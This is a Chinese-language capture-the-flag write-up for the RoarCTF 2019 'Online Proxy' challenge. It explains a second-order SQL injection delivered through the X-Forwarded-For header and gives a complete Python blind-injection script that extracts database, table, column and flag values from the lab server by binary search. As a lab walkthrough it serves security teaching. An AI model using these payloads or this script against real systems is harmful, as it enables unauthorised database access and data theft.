[RoarCTF 2019]Online Proxy

题目

image.png

image.png

知识点

  • X-Forwarded-For注入
  • 二次注入
  • 盲注
image

看了wp,知道注入点在X-Forwarded-For处,而且是个二次注入

回显的地方在这里

image

我们第一次输入

1' or '1

第二次和第三次都输入相同的数据,比如111

由于第一次输入的1' or '1和第二次输入的111不一样,回显

image

此时1' or '1 已经存入数据库中,而且111与1' or '1不一样,所以服务器不会从数据库里查找1' or '1,而是直接把上次的IP显示出来

当我们再输入一次111,即第三次的输入。此时的111与前面输入的111相同,相当于模拟ip不再变化,此时服务器要从数据库中查111的last ip,就会执行 1' or '1

贴一下代码,注意flag不在当前数据库中

# coding:utf-8 
import requests
import time
url = 'http://node3.buuoj.cn:25869/'

res = ''
for i in range(1,200):
    print(i)
    left = 31
    right = 127
    mid = left + ((right - left)>>1)
    while left < right:
        #payload = "0' or (ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{}) or '0".format(i,mid)
        #payload  = "0' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'F4l9_D4t4B45e'),{},1))>{}) or '0".format(i,mid)
        #payload  = "0' or (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'F4l9_t4b1e'),{},1))>{}) or '0".format(i,mid)
        payload = "0' or (ascii(substr((select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e),{},1))>{}) or '0".format(i,mid)
        headers = {
                    'Cookie': 'track_uuid=6e17fe5e-140c-4138-dea6-d197aa6214e3',
                    'X-Forwarded-For': payload
                    }
        r = requests.post(url = url, headers = headers)

        payload = '111'
        headers = {
                    'Cookie': 'track_uuid=6e17fe5e-140c-4138-dea6-d197aa6214e3',
                    'X-Forwarded-For': payload
                    }
        r = requests.post(url = url, headers = headers)

        payload = '111'
        headers = {
                    'Cookie': 'track_uuid=6e17fe5e-140c-4138-dea6-d197aa6214e3',
                    'X-Forwarded-For': payload
                    } 
        r = requests.post(url = url, headers = headers)


        if r.status_code == 429:
            print('too fast')
            time.sleep(2)
        if 'Last Ip: 1'  in r.text:
            left = mid + 1
        elif 'Last Ip: 1' not in r.text:
            right = mid 
        mid = left + ((right-left)>>1)
    if mid == 31 or mid == 127:
        break
    res += chr(mid)
    print(str(mid),res)
    time.sleep(1)
# information_schema,ctftraining,mysql,performance_schema,test,ctf,F4l9_D4t4B45e
#F4l9_t4b1e
#F4l9_C01uMn

你可能感兴趣的:([RoarCTF 2019]Online Proxy)